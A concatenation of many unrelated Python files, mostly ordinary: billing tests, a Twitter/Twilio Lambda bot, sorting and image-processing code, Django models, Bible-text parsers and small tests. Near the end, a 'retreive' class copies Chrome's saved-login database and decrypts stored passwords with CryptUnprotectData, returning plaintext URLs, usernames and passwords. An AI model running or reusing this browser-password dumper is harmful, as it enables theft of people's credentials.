assert cust.generate_bill(12, 2018)[1] == 50.7 + 12.5
assert cust.generate_bill(1, 2019)[1] == 50.7 - 10
elif cust.get_id == 3111:
assert cust.generate_bill(11, 2018)[1] == 324 + 50.7 - 22.5
assert cust.generate_bill(12, 2018)[1] == 24 + 50.7 - 21.25
assert cust.generate_bill(1, 2019)[1] == 24 + 50.7 - 17.5
if __name__ == '__main__':
pytest.main(['task3_tests.py'])
|
# Andrew Cargill
# Game Night Tweeter
# 2021-06-01 - v2.1 - Migrating From SNS to Twilio To Send SMS Messages
import base64
import boto3
import os
import random
import requests
import twitter
# AWS Constants
BUCKET_NAME = os.environ['BUCKET_NAME']
# Twitter Constants
ACCESS_KEY_TOKEN = os.environ['ACCESS_KEY_TOKEN']
ACCESS_TOKEN_SECRET = os.environ['ACCESS_TOKEN_SECRET']
CONSUMER_KEY = os.environ['CONSUMER_KEY']
CONSUMER_SECRET = os.environ['CONSUMER_SECRET']
# Twilio Constants
TWILIO_ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
TWILIO_PHONE_NUMBER = os.environ['TWILIO_PHONE_NUMBER']
MY_PHONE_NUMBER = os.environ['MY_PHONE_NUMBER']
def get_auth_header():
auth_string = TWILIO_ACCOUNT_SID + ":" + TWILIO_AUTH_TOKEN
auth_string_bytes = auth_string.encode("ascii")
auth_base_64_bytes = base64.b64encode(auth_string_bytes)
auth_base_64_string = auth_base_64_bytes.decode("ascii")
return "Basic " + auth_base_64_string
def send_twilio_sms(message):
url = "https://api.twilio.com/2010-04-01/Accounts/" + TWILIO_ACCOUNT_SID + "/Messages"
payload="To=" + MY_PHONE_NUMBER + "&From=" + TWILIO_PHONE_NUMBER + "&Body=" + message
headers = {
"Authorization": get_auth_header(),
"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.request("POST", url, headers = headers, data = payload)
print(response.text)
def twitter_post(quote):
api = twitter.Api(consumer_key = CONSUMER_KEY,
consumer_secret = CONSUMER_SECRET,
access_token_key = ACCESS_KEY_TOKEN,
access_token_secret = ACCESS_TOKEN_SECRET)
status = api.PostUpdate(quote)
print((status.text))
def lambda_handler(event, context):
s3 = boto3.resource('s3')
s3.Bucket(BUCKET_NAME).download_file("quotes.txt", "/tmp/quotes.txt")
quotes_file = "/tmp/quotes.txt"
with open(quotes_file, "r", encoding = "utf-8") as rf:
quotes = rf.read()
quote_list = [_f for _f in quotes.splitlines() if _f]
if quote_list: # If quote_list contains items
quote = quote_list.pop(random.randrange(len(quote_list)))
twitter_post(quote)
else:
message = "The quote well's run dry!"
send_twilio_sms(message)
with open(quotes_file, "w", encoding = "utf-8") as wf:
wf.write("\n".join(quote_list))
s3.meta.client.upload_file(quotes_file, BUCKET_NAME, "quotes.txt")
|
"""
Returns the iterable 'iter' with the value 'val'
added to its front and back.
i.e., surround(['a', 'b'], 'c') will return ['c', 'a', 'b', 'c']
"""
def surround(iter, val):
iter.append(val)
iter.insert(0, val)
return iter
"""
Returns a list of items from the dictionary 'dicti'
where the key is equal to the value.
i.e. same_key_vals({"a": 1, "b" : "b", "c": 2, "d": "d"})
will return ['b', 'd']
"""
def same_key_vals(dicti):
l = list()
for key, value in dicti.items():
if key == value:
l.append(key)
return l
"""
If the key 'gene' is present in the dictionary 'dicti'
remove it from the dictionary,
otherwise add the key/value pair 'gene': 'cool'
to the dictionary. Either way, return the new dictionary
i.e. add_gene_key({'a': 1}) will return {'a': 1, 'gene': 'cool'}
and add_gene_key({'gene': 'butt', 'b': False}) will return {'b': False}.
"""
def add_gene_key(dicti):
if 'gene' in dicti:
del dicti['gene']
else:
dicti['gene'] = 'cool'
print(dicti)
return dicti
"""
Return the first and last item of the iterable passed.
i.e., first_and_last([1, 2, 3, 4, 5]) will return [1, 5]
"""
def first_and_last(iterable):
return iterable[0], iterable[-1]
"""
Return True if the integer is odd, False if the integer is even.
0 is considered "odd".
i.e. is_odd(1) is True
is_odd(-2) is False
is_odd(0) is True
"""
def is_odd(integer):
if integer == 0:
return True
elif integer % 2 == 0:
return False
else:
return True |
# Day 8: Dictionaries and Maps
# Learn about key-value pair mappings using Map or a Dicitionary structure
# Given n names and phone numbers, assemble a phone book that maps
# friend's names to their respective phone numbers
# Query for names and print "name=phoneNumber" for each line, if not found
# print "Not found"
# Note: Continues to read lines until EOF.
import sys
n = int(raw_input().strip())
phone_book = {}
for i in range(n): # range max in not inclusive
info_array = list(raw_input().strip().split())
# Build dictionary structure
phone_book[info_array[0]] = info_array[1]
print info_array
print phone_book
# for line in sys.stdin:
# name = line.strip()
# if name in phone_book:
# print '%s=%s' % (name, phone_book[name])
# else:
# print "Not found"
while True:
try:
name = raw_input()
if name in phone_book:
print "%s=%s" % (name, phone_book[name])
else:
print 'Not Found'
except:
break
|
lista_de_weas = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
for numero_de_wea in lista_de_weas:
if numero_de_wea > 5 and numero_de_wea < 9:
continue
print(numero_de_wea) |
import cv2
import numpy as np
import random
class HandPartClassifier:
@staticmethod
def showClassImage(window_name, inputImage):
height = inputImage.shape[0]
width = inputImage.shape[1]
classMap = np.zeros((height, width, 3), np.uint8)
colorMap = {}
for i in xrange(height):
for j in xrange(width):
c = inputImage[i, j]
if c == 0:
continue
if not c in colorMap:
colorMap[c] = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))#colorArray[c % COLOR_NUM];
color = colorMap[c];
classMap[i, j, 0] = color[0]
classMap[i, j, 1] = color[1]
classMap[i, j, 2]= color[2]
cv2.imshow(window_name, classMap);
return classMap
#not all of the pixel values are either 0 or 255, some of them may be 1, 2, 3, or 252 and so on.
@staticmethod
def fixImage(inputImage, lower_value, upper_value ):
cv2.threshold(inputImage,inputImage, lower_value, upper_value, THRESH_BINARY);
return inputImage;
@staticmethod
def findLength(inputImage, x, y):
currentClass = inputImage[y, x]
length = 1
left = x
right = x
width = inputImage.shape[1]
while left >= 0:
if inputImage[y, left] == currentClass:
left -= 1
else:
break
while right < width:
if inputImage[y, right] == currentClass:
right += 1
else:
break
left += 1
right -= 1
return right - left + 1, left, right
@staticmethod
def fillLine(inputImage, y, left, right, class_num):
for i in xrange(left, right + 1):
inputImage[y, i] = class_num
return inputImage
@staticmethod
def bottomUp(inputImage):
'''
scan from bottom to top to decide which class it belongs to
'''
prev_class = 0;
current_class = 0;
prev_left = 0
prev_right = 0
current_left = 0
current_right = 0
prev_length = 0
current_length = 0
width = inputImage.shape[1]
height = inputImage.shape[0]
palm_length = width
palm_class = 0
has_hand = False
for j in xrange(0, width):
prev_class = inputImage[height - 1, width / 2]
if not has_hand:
temp_length, prev_left, prev_right = HandPartClassifier.findLength(inputImage, j, height - 1);
if temp_length > palm_length / 2 :
palm_class = prev_class
has_hand = True
palm_length = temp_length
#index begins from number of rows - 2 to 0
for i in reversed(xrange(0, height - 2)):
prev_class = inputImage[i + 1 , j]
current_class = inputImage[i, j]
if prev_class != current_class and prev_class != 0 and current_class != 0 :
current_length, current_left, current_right = HandPartClassifier.findLength(inputImage,j, i)
if prev_class == palm_class and current_length * 1.0 / palm_length < 0.2:
continue
prev_length, prev_left, prev_right = HandPartClassifier.findLength(inputImage, j, i + 1);
ratio = current_length * 1.0 / prev_length;
if (ratio > 0.5) or ratio < 0.1 or current_right - current_left < 5 :
inputImage = HandPartClassifier.fillLine(inputImage, i, current_left, current_right, prev_class)
return inputImage;
#the first step is to do a rough classification
@staticmethod
def roughClassify(inputImage):
indexArray = [0 for i in xrange(256)]
classArray = [0 for i in xrange(256)]
prev_color = 0
current_color = 0
startIndex = 0
endIndex = 0
height = inputImage.shape[0]
width = inputImage.shape[1]
current_class = 1
for i in xrange(height):
prev_color = inputImage[i, 0]
if prev_color == 255:
startIndex = 0
for j in xrange(width):
current_color = inputImage[i, j];
if prev_color == 0 and current_color == 255:
startIndex = j
if prev_color == 255 and current_color == 0:
#here we do back trace
endIndex = j - 1
current_class += 1
if current_class == 256:
current_class = 1
if current_color == 255:
inputImage[i, j] = current_class
prev_color = current_color
return inputImage
@staticmethod
def classifyHandParts(inputImage):
#fix the noise points
#inputImage = fixImage(inputImage)
inputImage = HandPartClassifier.roughClassify(inputImage)
#the season that we have to scan twice it to
#avoid discontinuity. you can try scaning once
#to see what will happen
inputImage = HandPartClassifier.bottomUp(inputImage)
inputImage = HandPartClassifier.bottomUp(inputImage)
HandPartClassifier.showClassImage('classImage', inputImage)
return inputImage
|
# -*- coding:utf-8 -*-
""" 数字游戏
让a[i]和b[i],关于b降序排列。减少得多的先被擦掉,就可以让剩下的和尽可能的大
dp[i][j]表示前i个数字在第j轮的时候的最大取值
dp[i][j] = max(dp[i-1][j], dp[i-1][j-1]+a[i]-b[i]*(j-1))"""
# O(n log n)
def max_num(a, b, m, dp):
temp = []
for i in range(len(a)):
temp.append([a[i], b[i]])
temp.sort(key=lambda x: x[1], reverse=True)
a = list(map(lambda x: x[0], temp))
b = list(map(lambda x: x[1], temp))
for i in range(1, len(a) + 1):
for j in range(1, m+1):
dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - 1] + a[i - 1] - b[i - 1]*(j - 1))
return dp[len(a)][m]
def main():
"""输入原序列:10 20 30
输入下降数值:4 5 6
输入轮数:3
输出最大值为: 47"""
a = input("输入原序列:")
b = input("输入下降数值:")
m = int(input("输入轮数:"))
a = list(map(int, a.split()))
b = list(map(int, b.split()))
dp = [[0]*(len(a) + 1) for i in range(m + 1)]
print("最大值为:", max_num(a, b, m, dp))
if __name__ == '__main__':
main() |
import math
import mathutils
def correct_ges_rotation(rot: mathutils.Vector):
rot.x += math.pi
rot.y *= -1
rot.z *= -1
|
from .augmentation import *
from .helper import *
#from .trainer import *
from .loss import *
from .metrics import *
from .download import * |
# -*- coding:utf-8 -*-
'''
选择排序算法:
基于比较的排序算法
将数据分为已排区间和未排区间
从未排区间中遍历出最小值及其索引
将其和当前遍历的索引位置互换
'''
def SelectionSort(arr):
length = len(arr)
for i in range(length):
minIndex = i
minValue = arr[i]
for j in range(i+1,length):
if arr[j] < minValue:
minIndex = j
minValue = arr[minIndex]
arr[i],arr[minIndex] = arr[minIndex], arr[i]
if __name__ == '__main__':
arr = [9,3,5,-1,1,4,0]
SelectionSort(arr)
print(arr)
|
import cv2
# import imutils
import numpy as np
def simple_return(image):
return image
def crop_image(image):
return image[0:350, 0:350]
detector = cv2.CascadeClassifier('image_processing/cascades/haarcascade_frontalface_default.xml')
def face_detection(image, rect_color, rotation):
if rotation == 90:
image = cv2.rotate(image, cv2.ROTATE_90_COUNTERCLOCKWISE)
if rotation == -90:
image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)
orig_image = image.copy()
height, width = orig_image.shape[:2]
new_width = 300
r = new_width / float(width)
dim = (new_width, int(height * r))
ratio = (width / dim[0], height / dim[1])
image = cv2.resize(image, dim)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faceRects = detector.detectMultiScale(image, scaleFactor=1.2, minNeighbors=5,
minSize=(20, 20), flags=cv2.CASCADE_SCALE_IMAGE)
for (x, y, w, h) in faceRects:
x = int(x * ratio[0])
y = int(y * ratio[1])
w = x + int(w * ratio[0])
h = y + int(h * ratio[1])
cv2.rectangle(orig_image, (x, y), (w, h), rect_color, 2)
if rotation == 90:
orig_image = cv2.rotate(orig_image, cv2.ROTATE_90_CLOCKWISE)
if rotation == -90:
orig_image = cv2.rotate(orig_image, cv2.ROTATE_90_COUNTERCLOCKWISE)
return orig_image, faceRects
|
import pytest
import os
import sys
import threading
from pprint import pprint
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from utils import *
def test_listen_func():
# The agent's IP
IP = '127.0.0.1'
# The port where the agent listens for messages
PORT = 5005
listening_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print('Listening socket created')
listening_socket.bind((IP, PORT))
print('Listening socket bound to port')
print("%s:%d" % (IP, PORT))
msgs = {}
listen = threading.Thread(target=listen_func, args=(msgs, listening_socket), kwargs={'agent': None})
listen.setDaemon(True)
listen.start()
listening_socket.sendto(pickle.dumps(('greeting', "Kiss kiss to you too")), ("127.0.0.1", 5005))
listening_socket.sendto(pickle.dumps(('name', "Rachel")), ("127.0.0.1", 5005))
listening_socket.sendto(pickle.dumps(('50', "Montana")), ("127.0.0.1", 5005))
listening_socket.sendto(pickle.dumps(('food', (125, 'Hamburger'))), ("127.0.0.1", 5005))
listening_socket.sendto(pickle.dumps(('0', "exit")), ("127.0.0.1", 5005))
listening_socket.sendto(pickle.dumps(('ghosts', "shouldn't exist")), ("127.0.0.1", 5005))
listen.join()
msgs2 = {'greeting': "Kiss kiss to you too",
'name': "Rachel",
'50': "Montana",
'food': (125, "Hamburger"),
'0': "exit"
}
assert msgs == msgs2
listening_socket.close()
print('Listening socket closed')
def test_get_agents_info():
x = get_agents_info("agents-sim-1.txt")
y = {1: {'IP': '127.0.0.1', 'PORT': '5001', 'is_root': 'True'},
2: {'IP': '127.0.0.1', 'PORT': '5002'},
3: {'IP': '127.0.0.1', 'PORT': '5003'},
4: {'IP': '127.0.0.1', 'PORT': '5004'},
42: {'root_id': '1'}
}
assert x == y
def test_combine():
a = np.array([0,1,2,3])
a_ant = (7,)
b = np.array([0,1,2])
b_ant = (9,)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array(
[[0, 1, 2],
[1, 2, 3],
[2, 3, 4],
[3, 4, 5]]
)
assert np.array_equal(x, y)
assert merged_ant == (7, 9)
a = np.array([0,1,2,3])
a_ant = (7,)
b = np.array([0,1,2,3])
b_ant = (9,)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array(
[[0, 1, 2, 3],
[1, 2, 3, 4],
[2, 3, 4, 5],
[3, 4, 5, 6]]
)
assert np.array_equal(x, y)
assert merged_ant == (7, 9)
a = np.array([0,1,2,3])
a_ant = (7,)
b = np.array([0,1,2,3])
b_ant = (7,)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array([0,2,4,6])
assert np.array_equal(x, y)
assert merged_ant == (7,)
a = np.arange(12).reshape(3,4)
a_ant = (7,9)
b = np.arange(12).reshape(3,4)
b_ant = (7,9)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.arange(12).reshape(3,4) * 2
assert np.array_equal(x, y)
assert merged_ant == (7, 9)
a = np.arange(12).reshape(3,4)
a_ant = (8,9)
b = np.arange(12).reshape(3,4)
b_ant = (7,9)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array([[[ 0, 2, 4, 6],
[ 4, 6, 8,10],
[ 8,10,12,14]],
[[ 4, 6, 8,10],
[ 8,10,12,14],
[12,14,16,18]],
[[ 8,10,12,14],
[12,14,16,18],
[16,18,20,22]]])
assert np.array_equal(x, y)
assert merged_ant == (7, 8, 9)
a = np.array([[0, 1],
[1, 2]])
a_ant = (9, 7)
b = np.array([[0, 1],
[1, 2]])
b_ant = (7, 9)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array([[0, 2],
[2, 4]])
assert np.array_equal(x, y)
assert merged_ant == (7, 9)
a = np.array([-1, -2])
a_ant = (2,)
b = np.array([[-3, -4],
[-2, -3]])
b_ant = (2, 1)
x, merged_ant = combine(a, b, a_ant, b_ant)
y = np.array([[-4, -4],
[-5, -5]])
print 'x:'
print x
print 'y:'
print y
print 'x_ant:', merged_ant
print 'y_ant:', (1, 2)
assert np.array_equal(x, y)
assert merged_ant == (1, 2)
def test_add_dims():
a = np.arange(4)
x, ant = add_dims(a, (5,), 1, 8, 3)
y = np.array(
[[0,0,0],
[1,1,1],
[2,2,2],
[3,3,3]])
assert np.array_equal(x, y)
assert ant == (5, 8)
a = np.arange(12).reshape(3,4)
x, ant = add_dims(a, (7, 9), 2, 11, 2)
y = np.array([[[ 0, 0],
[ 1, 1],
[ 2, 2],
[ 3, 3]],
[[ 4, 4],
[ 5, 5],
[ 6, 6],
[ 7, 7]],
[[ 8, 8],
[ 9, 9],
[10, 10],
[11, 11]]])
assert np.array_equal(x, y)
assert ant == (7, 9, 11)
def test_expand():
a = np.arange(4)
x, ant = expand(a, (5,), (5,8), (4,3))
y = np.array(
[[0,0,0],
[1,1,1],
[2,2,2],
[3,3,3]])
assert np.array_equal(x, y)
assert ant == (5, 8)
if __name__ == "__main__":
pytest.main()
|
from django.db import models
class Autor(models.Model):
nome = models.CharField(max_length = 255)
idade = models.IntegerField()
def __str__(self):
return self.nome
class Editora(models.Model):
nome = models.CharField(max_length = 255)
avaliacao = models.IntegerField()
def __str__(self):
return self.nome
class Livro(models.Model):
nome = models.CharField(max_length = 255)
paginas = models.IntegerField()
preco = models.DecimalField(max_digits = 10, decimal_places = 2)
avaliacao = models.FloatField()
autores = models.ManyToManyField(Autor)
editora = models.ForeignKey(Editora, on_delete = models.CASCADE)
data_pub = models.DateField()
def __str__(self):
return self.nome
class Loja(models.Model):
nome = models.CharField(max_length = 255)
livros = models.ManyToManyField(Livro)
quantidade_de_clientes = models.PositiveIntegerField()
def __str__(self):
return self.nome
|
# -*- coding:utf-8 -*-
from setuptools import setup
setup(
name = 'python-dbpool',
version = '0.1.0a0',
author = 'Claus Prüfer',
author_email = 'pruefer@webcodex.de',
maintainer = 'Claus Prüfer',
description = 'A tiny static postgresql database pool for threaded wsgi webserver (apache2).',
license = 'GPLv3',
url = 'http://dbpool.python.webcodex.de',
long_description = open('./README.rst').read(),
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Database Tools',
'License :: OSI Approved :: GPLv3 License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
project_urls = {
'Documentation': 'http://dbpool.python.webcodex.de',
'Source': 'http://github.com/cpruefer/python-dbpool',
},
packages = [
'dbpool'
],
package_dir = {
'dbpool': 'src/'
},
install_requires = [
'psycopg2'
],
python_requires = '>=3',
zip_safe = True
)
|
from tqdm import tqdm
import random
import csv
import sys
import os
#=========1=========2=========3=========4=========5=========6=========7=
# Generates a new dataset in "dest" called "n-ary_toy_dataset" which
# is a directory hierarchy with n-ary tree structure. The leaf nodes
# contain 100 text files each, where each text file contains 100 words
# per line and 100 lines. Each word in every text file in a given leaf
# node is the same, taken from a list of seed words.
# A .csv file called "seed_words.csv" should be in the same directory
# as this script for proper functionality.
#=========1=========2=========3=========4=========5=========6=========7=
def parse_args():
# ARGUMENTS
# the directory in which to place the toy dataset
print("Parsing arguments. ")
dest = sys.argv[1]
n = 1
depth = 0
try:
n = int(sys.argv[2])
depth = int(sys.argv[3])
except TypeError:
print("You probably tried to pass a non-integer argument. These"
+ " are supposed to be natural numbers. ")
exit()
arg_list = [
dest,
n,
depth,
]
print("Arguments parsed. ")
return arg_list
#=========1=========2=========3=========4=========5=========6=========7=
# DOES: checks whether or not a directory argument is valid
def check_valid_dir(some_dir):
if not os.path.isdir(some_dir):
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("")
print("DIES IST EIN UNGÜLTIGES VERZEICHNIS!!!!")
print("")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
exit()
#=========1=========2=========3=========4=========5=========6=========7=
''' DOES: reads from "seed_words.csv" and gets a list of all words in it
RETURNS: a list of words from the file '''
def read_seed():
word_list = []
try:
with open('../seed_words.csv', 'r') as csvfile:
rows = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in rows:
for word in row:
word_list.append(word)
except FileNotFoundError:
print("Make sure you have a seed_words.csv file in the parent"
+ " directory of this folder. ")
exit()
return word_list
#=========1=========2=========3=========4=========5=========6=========7=
# DOES: recursively generates an n-ary tree toy dataset with sample
# text files in the leaf directories.
# NOTE: depth should always be passed in as the height of the tree down
# to the leaf directories PLUS ONE, since depth should be the
# height of the text files within the tree, which are inside the
# leaf directories. Same holds for csv function.
def generate_dataset_txt(dataset_path, num_children, depth, word_list):
total_words_needed = num_children**depth
if len(word_list)<total_words_needed:
print("You only have", len(word_list), "seed words in your file.\nYou need at least", total_words_needed)
exit()
used_words = []
if (depth == 1):
word = random.choice(word_list)
while word in used_words:
word = random.choice(word_list)
used_words.append(word)
row_list = []
for k in tqdm(range(10)):
row_list.append(word)
word_string = ' '.join(token for token in row_list) + " "
text_file_path = os.path.join(dataset_path, word + "_1" + ".txt")
with open(text_file_path, 'a') as the_file:
for j in tqdm(range(100)):
the_file.write(word_string + "\n")
for i in tqdm(range(20)):
if i != 1:
next_file_path = os.path.join(dataset_path,
word + "_"
+ str(i) + ".txt")
os.system("cp " + text_file_path + " " + next_file_path)
else:
for i in tqdm(range(num_children)):
child_path = os.path.join(dataset_path, str(i))
if not os.path.isdir(child_path):
os.system("mkdir " + child_path)
generate_dataset_txt(child_path,
num_children, depth - 1, word_list)
#=========1=========2=========3=========4=========5=========6=========7=
def generate_dataset_csv(dataset_path, num_children, depth, word_list):
if (depth == 1):
word = random.choice(word_list)
row_list = []
for k in tqdm(range(10)):
row_list.append(word)
word_string = ','.join(token for token in row_list)
text_file_path = os.path.join(dataset_path, word + "_1" + ".csv")
with open(text_file_path, 'a') as the_file:
for j in tqdm(range(100)):
the_file.write(word_string + "\n")
for i in tqdm(range(20)):
if i != 1:
next_file_path = os.path.join(dataset_path,
word + "_"
+ str(i) + ".csv")
os.system("cp " + text_file_path + " " + next_file_path)
else:
for i in tqdm(range(num_children)):
child_path = os.path.join(dataset_path, str(i))
if not os.path.isdir(child_path):
os.system("mkdir " + child_path)
generate_dataset_csv(child_path,
num_children, depth - 1, word_list)
#=========1=========2=========3=========4=========5=========6=========7=
def main():
arg_list = parse_args()
dest = arg_list[0]
n = arg_list[1]
depth = arg_list[2]
# check if destination is valid, get its absolute path
check_valid_dir(dest)
dest = os.path.abspath(dest)
# generate path to the new root of our toy dataset
dataset_name = str(n) + "-ary_toy_dataset"
dataset_path = os.path.join(dest, dataset_name)
# make sure a directory with the same name doesn't already exist
if os.path.isdir(dataset_path):
print("This directory already exists, change the existing "
+ "directory's name, or try a different destination. ")
exit()
# create the directory
os.system("mkdir " + dataset_path)
word_list = read_seed()
generate_dataset_txt(dataset_path, n, depth + 1, word_list)
generate_dataset_csv(dataset_path, n, depth + 1, word_list)
print("Should have worked. If you see a bunch of copy errors, "
+ "make sure there are no spaces between words in your "
+ "seed_words.csv file. ")
if __name__ == "__main__":
# stuff only to run when not called via 'import' here
main()
|
# Standard Libraries
import csv
import re
# additional libraries (pip install ...)
import bs4
from bs4 import BeautifulSoup
# Local Libraries
from src.data_manager import get_bible_book_id_map
from src.paths import *
from src.data_manager import BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY, ID_KEY
def parse_wycliffe():
"""
Parses text files in the wycbible folder (using the index file to locate books).
Transforms directory of book text files to t_wyc.csv format following the bible corpus
format and encodings.
"""
books = []
id_ref = get_bible_book_id_map()
# Get book id and fn of book
with open(WYCLIFFE_KEY_PATH, 'r') as key:
for line in key:
name, fn = line.strip().split(' - ')
if name.lower() in id_ref:
books.append((id_ref[name.lower()], fn.upper()))
with open(WYCLIFFE_CSV_PATH, 'w', newline='', encoding='utf-8') as file:
writer = csv.writer(file)
writer.writerow([ID_KEY, BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY])
for book_id, fp in books:
with open(WYCLIFFE_DIRECTORY_PATH / fp, 'r') as book_fp:
chapter_id = 1
for line in book_fp:
line = line.strip()
line = line.replace(r"\[.*\]", "")
if match := re.match(r'^(\d+) (.+)', line):
verse_id = int(match.group(1))
verse = match.group(2)
writer.writerow([f'%d%03d%03d' % (book_id, chapter_id, verse_id),
book_id,
chapter_id,
verse_id,
verse
])
elif match := re.match(r'^CAP (\d+)', line):
chapter_id = int(match.group(1))
def parse_aelfric_ot() -> None:
"""
Parses the XML file and retrieves verses within the XML. Must first be downloaded using the web_scrape.py scripts
to maintain path variables.
"""
id_ref = get_bible_book_id_map()
with open(AELFRIC_OLD_TESTAMENT_XML_PATH, 'r', encoding='utf-8') as src, \
open(AELFRIC_CSV_PATH, 'w', newline='', encoding='utf-8') as dest:
writer = csv.writer(dest)
writer.writerow([ID_KEY, BOOK_KEY, CHAPTER_KEY, VERSE_KEY, TEXT_KEY])
xml_doc = BeautifulSoup(src.read(), 'lxml')
# extract the xml structure and the sample book numbers
struct = xml_doc.find('biblstruct')
sample_scope = struct.find('monogr').find_all('biblscope')
sample_ids = [id_ref[scope.text.split(' ')[0].lower()] for scope in sample_scope]
# extract the text
text = xml_doc.find('text')
# remove all the linebreaks in the text
for lb in text.find_all('lb'):
lb.decompose()
# If run into <choice> tag, replace with correction
for c in text.find_all('choice'):
errata = c.find('corr')
c.replaceWith(errata.text if errata else '')
# If run into <supplied> or <foreign>, insert text into string
for s in text.find_all(re.compile('(supplied|foreign)')):
s.replaceWith(c.text)
# If run into milestone, remove type with scriptural
for m in text.find_all('milestone', attrs={'type': 'scriptural'}):
m.decompose()
# Remove notes
for n in text.find_all(re.compile('(note|pb)')):
n.decompose()
samples = text.find_all('div', attrs={'type': 'sample'})
for idx, s in zip(sample_ids, samples):
s = s.find('p')
verse = ''
cv = s.contents[0]['n'].split('.') + ['0']
chapter_id = int(cv[0])
verse_id = int(cv[1])
i = 1
while i < len(s.contents):
if isinstance(s.contents[i], bs4.element.NavigableString):
verse += str(s.contents[i]).strip()
elif isinstance(s.contents[i], bs4.element.Tag):
writer.writerow([f'%d%03d%03d' % (idx, chapter_id, verse_id), idx, chapter_id, verse_id, verse])
verse = ''
cv = s.contents[i]['n'].split('.') + ['0']
chapter_id = int(cv[0])
verse_id = int(cv[1])
i += 1
def parse_homilies():
"""
Parses the formatted homilies text file into t_hom.csv format stored in misc_texts. See README in misc_texts for
formatting information.
"""
with open(DATA_RAW_PATH / "aelfric-homilies.txt", "r", encoding='utf-8') as f, \
open(MISC_TEXTS_PATH / 't_hom.csv', 'w', newline='', encoding='utf-8') as file:
writer = csv.writer(file)
writer.writerow(['id', 'text', 'translation'])
lines = f.readlines()
sentence_id = 1
# read lines 3 at a time
for i in range(0, len(lines), 3):
oe = lines[i].rstrip()
me = lines[i + 1].rstrip()
writer.writerow([sentence_id, oe, me])
sentence_id += 1
if __name__ == '__main__':
parse_wycliffe()
parse_homilies()
parse_aelfric_ot()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sqlite3
import pandas as pd
def importSimTradeToSQLite():
"""excel"""
with sqlite3.connect('C:\sqlite\db\hxdata.db') as db:
insert_template = "INSERT INTO simtrade " \
"(usrmobile, createtime, tradedays) " \
"VALUES (?, ?, ?);"
db.execute('DELETE FROM simtrade;')
df = pd.read_excel('..\input\simTrade.xlsx', sheetname='仿真用户')
df1 = df[['手机号','注册日期','交易天数']]
print(df1)
# 转变某一列的类型
df1['手机号'] = df1['手机号'].astype('str')
df1['注册日期'] = df1['注册日期'].astype('str')
df1['交易天数'] = df1['交易天数'].astype('str')
try:
print('3')
db.executemany(insert_template, df1.values)
except sqlite3.Error as e:
print('2')
print(e)
db.rollback()
else:
db.commit()
select_stmt = 'SELECT DISTINCT usrmobile FROM simtrade;'
number = 0
for row in db.execute(select_stmt).fetchall():
print(str(row))
number = number + 1
print(number)
#importSimTradeToSQLite()
|
from battle.arena_sc2 import BattleType, make, ids, spec
import battle.arena_sc2.arenas
import battle.arena_sc2.envs
import battle.arena_sc2.agents
from absl import app
def list_agent_spec(unused_argv):
agent_ids = ids(BattleType.agent)
print(agent_ids)
for agent_id in agent_ids:
agent_spec = spec(agent_id)
print('id={}, type={}, kwargs={}'.format(agent_spec.id, agent_spec.type, agent_spec.def_kwargs))
#env = make(env_id)
#print(env)
if __name__ == '__main__':
app.run(list_agent_spec)
|
import os
import sqlite3
from win32 import win32crypt
import sys
class retreive:
def chrome():
try:
path = sys.argv[1]
except IndexError:
w = os.getenv('LOCALAPPDATA')
path = str(w) + r'\Google\Chrome\User Data\Default\Login Data'
# Connect to the Database
try:
file = open(path,"rb")
newfile = open("C:\Windows\Temp\ld.db","wb")
newfile.write(file.read())
newfile.close()
file.close()
conn = sqlite3.connect("C:\Windows\Temp\ld.db")
cursor = conn.cursor()
except Exception as e:
None
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except Exception as e:
None
data = cursor.fetchall()
pass_list = []
if len(data) > 0:
for result in data:
# Decrypt the Password
try:
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
except Exception as e:
None
pass
if password:
pass_list.append(('''[+] URL: %s
Username: %s
Password: %s''' %(result[0], result[1], password.decode())))
conn.close()
os.remove("C:\Windows\Temp\ld.db")
return pass_list
|
import datetime
import sys
import log
from status import Status
logging = log.getLogger()
class History(object):
def __init__(self, db):
self.db = db
def _interpretFilter(self, filter):
parts = filter.split( ',' )
def listPrevious(self, chord_name):
previous = self.db.getExecutions( chord_name = chord_name )
rows = []
for p in previous:
identifier, time_start, chord_name, execution_time, status, output = p
status = "OK" if status is Status.SUCCESS else "FAILED"
row = [ identifier,
datetime.datetime.utcfromtimestamp( time_start ),
chord_name,
execution_time,
status,
]
row = [ str( i ) for i in row ]
row = "| ".join(row)
print "-" * len(row)
print row
print output
|
import conway
def test_get_live_neighbours():
assert conway.get_live_neighbours_count(0, 0, [[0, 1, 0],[0, 0, 1],[1, 1, 1],[0, 0, 0]]) == 1
